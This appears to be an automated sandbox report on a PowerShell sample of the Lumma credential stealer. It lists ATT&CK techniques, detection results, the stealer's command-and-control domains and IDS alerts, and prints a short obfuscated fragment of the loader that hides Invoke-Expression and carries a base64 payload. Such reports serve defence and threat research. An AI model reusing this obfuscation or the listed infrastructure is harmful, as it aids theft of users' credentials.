| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
Malware Analysis System Evasion | |
|---|
| Source: | WMI Queries: | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | WMI Queries: | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Process information queried: | Jump to behavior | ||
| Source: | Code function: | 10_2_0043FCF0 | |
| Source: | Process token adjusted: | Jump to behavior | ||
HIPS / PFW / Operating System Protection Evasion | |
|---|
| Source: | Memory written: | Jump to behavior | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Key value queried: | Jump to behavior | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | WMI Queries: | ||
Stealing of Sensitive Information | |
|---|
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | Directory queried: | Jump to behavior | ||
| Source: | Directory queried: | Jump to behavior | ||
| Source: | Directory queried: | Jump to behavior | ||
| Source: | Directory queried: | Jump to behavior | ||
| Source: | Directory queried: | Jump to behavior | ||
| Source: | Directory queried: | Jump to behavior | ||
| Source: | Directory queried: | Jump to behavior | ||
| Source: | Directory queried: | Jump to behavior | ||
Remote Access Functionality | |
|---|
| Source: | File source: | ||
| Source: | File source: | ||
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Windows Management Instrumentation | 1 DLL Side-Loading | 211 Process Injection | 121 Virtualization/Sandbox Evasion | 2 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Screen Capture | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 PowerShell | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 211 Process Injection | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Deobfuscate/Decode Files or Information | Security Account Manager | 121 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 41 Data from Local System | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 3 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | 3 Clipboard Data | 114 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 11 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 22 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
InternetThis section contains all screenshots as thumbnails, including those not shown in the slideshow.
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 7% | Virustotal | Browse | ||
| 16% | ReversingLabs | Script-PowerShell.Trojan.LummaC |
⊘No Antivirus matches
⊘No Antivirus matches
⊘No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 100% | Avira URL Cloud | malware | ||
| 0% | Avira URL Cloud | safe | ||
| 100% | Avira URL Cloud | malware | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 100% | Avira URL Cloud | malware | ||
| 100% | Avira URL Cloud | malware |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| aleksandr-block.com | 188.114.97.3 | true | false | high | |
| steamcommunity.com | 104.102.49.254 | true | false | high | |
| littlenotii.biz | unknown | unknown | true | unknown | |
| fraggielek.biz | unknown | unknown | true | unknown | |
| nuttyshopr.biz | unknown | unknown | true | unknown | |
| grandiouseziu.biz | unknown | unknown | true | unknown | |
| marketlumpe.biz | unknown | unknown | true | unknown | |
| spookycappy.biz | unknown | unknown | true | unknown | |
| truculengisau.biz | unknown | unknown | true | unknown | |
| punishzement.biz | unknown | unknown | true | unknown |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| false | high | ||
| false | high | ||
| false | high | ||
| false | high | ||
| true |
| unknown | |
| false | high | ||
| false | high | ||
| false | high | ||
| false | high | ||
| false | high |
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| false |
| unknown | ||
| false | high | |||
| false | high | |||
| false |
| unknown | ||
| false | high | |||
| false |
| unknown | ||
| false | high | |||
| false |
| unknown | ||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false | high | |||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|---|
| 188.114.97.3 | aleksandr-block.com | European Union | 13335 | CLOUDFLARENETUS | false | |
| 104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | false |
| Joe Sandbox version: | 42.0.0 Malachite |
| Analysis ID: | 1591131 |
| Start date and time: | 2025-01-14 18:00:13 +01:00 |
| Joe Sandbox product: | CloudBasic |
| Overall analysis duration: | 0h 5m 8s |
| Hypervisor based Inspection enabled: | false |
| Report type: | full |
| Cookbook file name: | default.jbs |
| Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
| Number of analysed new started processes analysed: | 15 |
| Number of new started drivers analysed: | 0 |
| Number of existing processes analysed: | 0 |
| Number of existing drivers analysed: | 0 |
| Number of injected processes analysed: | 0 |
| Technologies: |
|
| Analysis Mode: | default |
| Analysis stop reason: | Timeout |
| Sample name: | 62.122.184.98 (3).ps1 |
| Detection: | MAL |
| Classification: | mal100.troj.spyw.evad.winPS1@8/5@10/2 |
| EGA Information: |
|
| HCA Information: |
|
| Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
- Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
| Time | Type | Description |
|---|---|---|
| 12:01:08 | API Interceptor | |
| 12:01:09 | API Interceptor |
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| 188.114.97.3 | Get hash | malicious | FormBook, PureLog Stealer | Browse |
| |
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | FormBook | Browse |
| ||
| Get hash | malicious | FormBook | Browse |
| ||
| Get hash | malicious | FormBook | Browse |
| ||
| Get hash | malicious | FormBook | Browse |
| ||
| Get hash | malicious | FormBook | Browse |
| ||
| Get hash | malicious | FormBook | Browse |
| ||
| Get hash | malicious | FormBook | Browse |
| ||
| 104.102.49.254 | Get hash | malicious | Socks5Systemz | Browse |
| |
| Get hash | malicious | Unknown | Browse |
|
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| aleksandr-block.com | Get hash | malicious | LummaC | Browse |
| |
| Get hash | malicious | LummaC | Browse |
| ||
| Get hash | malicious | LummaC | Browse |
| ||
| Get hash | malicious | LummaC | Browse |
| ||
| Get hash | malicious | LummaC | Browse |
| ||
| steamcommunity.com | Get hash | malicious | LummaC | Browse |
| |
| Get hash | malicious | LummaC | Browse |
| ||
| Get hash | malicious | LummaC | Browse |
| ||
| Get hash | malicious | LummaC | Browse |
| ||
| Get hash | malicious | LummaC | Browse |
| ||
| Get hash | malicious | LummaC | Browse |
| ||
| Get hash | malicious | LummaC | Browse |
| ||
| Get hash | malicious | LummaC | Browse |
| ||
| Get hash | malicious | LummaC | Browse |
| ||
| Get hash | malicious | LummaC | Browse |
|
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| CLOUDFLARENETUS | Get hash | malicious | LummaC | Browse |
| |
| Get hash | malicious | HTMLPhisher | Browse |
| ||
| Get hash | malicious | HTMLPhisher | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | HTMLPhisher | Browse |
| ||
| Get hash | malicious | HTMLPhisher | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | HTMLPhisher | Browse |
| ||
| Get hash | malicious | HTMLPhisher | Browse |
| ||
| AKAMAI-ASUS | Get hash | malicious | HTMLPhisher | Browse |
| |
| Get hash | malicious | AteraAgent | Browse |
| ||
| Get hash | malicious | Mirai | Browse |
| ||
| Get hash | malicious | Mirai | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | HTMLPhisher | Browse |
| ||
| Get hash | malicious | Mirai | Browse |
|
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| a0e9f5d64349fb13191bc781f81f42e1 | Get hash | malicious | LummaC | Browse |
| |
| Get hash | malicious | LummaC | Browse |
| ||
| Get hash | malicious | LummaC, PureLog Stealer | Browse |
| ||
| Get hash | malicious | LummaC | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
|
⊘No context
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 64 |
| Entropy (8bit): | 1.1940658735648508 |
| Encrypted: | false |
| SSDEEP: | 3:NlllulXg+//lz:NllUwu/l |
| MD5: | ED0FF51DEEE7DB96EC9C5624C12E0A04 |
| SHA1: | 515B7FC63DB9F9313A6AEE6B4A6266B0FB6FF3A7 |
| SHA-256: | B93B1F8411ACBB11CBECF0F4E344D7D6D3551801BD891B816FB4720E60CE357B |
| SHA-512: | FD82F7D0B1B6F1641D2FF3F4EC6FEF66E2AB0F2048D7A5BBC674C379DD429516198FFD6E6E445C6EC1A2763ADAACF6288026B4A90697D86C8EED743A71F177ED |
| Malicious: | false |
| Reputation: | moderate, very likely benign file |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 60 |
| Entropy (8bit): | 4.038920595031593 |
| Encrypted: | false |
| SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
| MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
| SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
| SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
| Malicious: | false |
| Reputation: | high, very likely benign file |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 60 |
| Entropy (8bit): | 4.038920595031593 |
| Encrypted: | false |
| SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
| MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
| SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
| SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3762TWKVDB5T2HC0WUS4.temp
Download File
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 6220 |
| Entropy (8bit): | 3.7292965457861227 |
| Encrypted: | false |
| SSDEEP: | 48:yf+TePCg8oU2fvsPukvhkvklCywlgjJIIlL8sSogZoKDJIIl/8sSogZo+1:h6PCg84dkvhkvCCt4JIIkH/JIIEHF |
| MD5: | 097D0312BBBE7C31421361F199D5E9DD |
| SHA1: | B01619A92440857DB3D4A8E58B9226E1F003418B |
| SHA-256: | 8C5C4BC4E512CC94723D84B5F9A3FE568A4EBAA8820A3990575607C99A0AD662 |
| SHA-512: | A662CA12CB1B2E100EDC573FE1C544CC1A1DC285F83FE8129667BCA39CB499B6EC72986D9FCDAED366E9B0ED51C2AF988C03C8419D5FF70440D6C8CD11A0A349 |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
Download File
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 6220 |
| Entropy (8bit): | 3.7292965457861227 |
| Encrypted: | false |
| SSDEEP: | 48:yf+TePCg8oU2fvsPukvhkvklCywlgjJIIlL8sSogZoKDJIIl/8sSogZo+1:h6PCg84dkvhkvCCt4JIIkH/JIIEHF |
| MD5: | 097D0312BBBE7C31421361F199D5E9DD |
| SHA1: | B01619A92440857DB3D4A8E58B9226E1F003418B |
| SHA-256: | 8C5C4BC4E512CC94723D84B5F9A3FE568A4EBAA8820A3990575607C99A0AD662 |
| SHA-512: | A662CA12CB1B2E100EDC573FE1C544CC1A1DC285F83FE8129667BCA39CB499B6EC72986D9FCDAED366E9B0ED51C2AF988C03C8419D5FF70440D6C8CD11A0A349 |
| Malicious: | false |
| Preview: |
| File type: | |
| Entropy (8bit): | 5.491524367200651 |
| TrID: | |
| File name: | 62.122.184.98 (3).ps1 |
| File size: | 537'125 bytes |
| MD5: | 2b60655a425eaa036531f18e96741444 |
| SHA1: | ffa85842df96dac9f6dac782cb1081251eaac749 |
| SHA256: | 930a09e6ee090e9f2b67e1a37270b4c31e3cb4fdad55cd8db34b11519759f145 |
| SHA512: | 42c0cb45071acb2a160888885937cf8fa541786384b5bf12b8803a61b7869f1afc45f94f2b2d138490c4079a8139bbbeec2a62c48615eb3877644de6a7da571a |
| SSDEEP: | 12288:srScfYL0kaO7oNtiE45hXTLr1qwofa54+:1QNtobTL5ofk4+ |
| TLSH: | 62B47D3141033C6E37AA2ECEA4006EC10C9D7997BB54D550AE899176B2BE13B4F6D9FC |
| File Content Preview: | .. $t0='IQIQQIIQIQQEX'.replace('IQIQQ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDANfKUWcAAAAAAA |
 | |
| Icon Hash: | 3270d6baae77db44 |
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-14T18:01:09.868069+0100 | 2059137 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (littlenotii .biz) | 1 | 192.168.2.10 | 54196 | 1.1.1.1 | 53 | UDP |
| 2025-01-14T18:01:09.877880+0100 | 2059133 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fraggielek .biz) | 1 | 192.168.2.10 | 64828 | 1.1.1.1 | 53 | UDP |
| 2025-01-14T18:01:09.890771+0100 | 2059135 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grandiouseziu .biz) | 1 | 192.168.2.10 | 57637 | 1.1.1.1 | 53 | UDP |
| 2025-01-14T18:01:09.903271+0100 | 2059141 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (marketlumpe .biz) | 1 | 192.168.2.10 | 57333 | 1.1.1.1 | 53 | UDP |
| 2025-01-14T18:01:09.914056+0100 | 2059143 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nuttyshopr .biz) | 1 | 192.168.2.10 | 54253 | 1.1.1.1 | 53 | UDP |
| 2025-01-14T18:01:09.924697+0100 | 2059145 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (punishzement .biz) | 1 | 192.168.2.10 | 57389 | 1.1.1.1 | 53 | UDP |
| 2025-01-14T18:01:09.936322+0100 | 2059151 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spookycappy .biz) | 1 | 192.168.2.10 | 62955 | 1.1.1.1 | 53 | UDP |
| 2025-01-14T18:01:09.947255+0100 | 2059153 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (truculengisau .biz) | 1 | 192.168.2.10 | 64010 | 1.1.1.1 | 53 | UDP |
| 2025-01-14T18:01:10.624646+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49704 | 104.102.49.254 | 443 | TCP |
| 2025-01-14T18:01:11.784193+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.10 | 49704 | 104.102.49.254 | 443 | TCP |
| 2025-01-14T18:01:12.372040+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49711 | 188.114.97.3 | 443 | TCP |
| 2025-01-14T18:01:13.123944+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.10 | 49711 | 188.114.97.3 | 443 | TCP |
| 2025-01-14T18:01:13.123944+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.10 | 49711 | 188.114.97.3 | 443 | TCP |
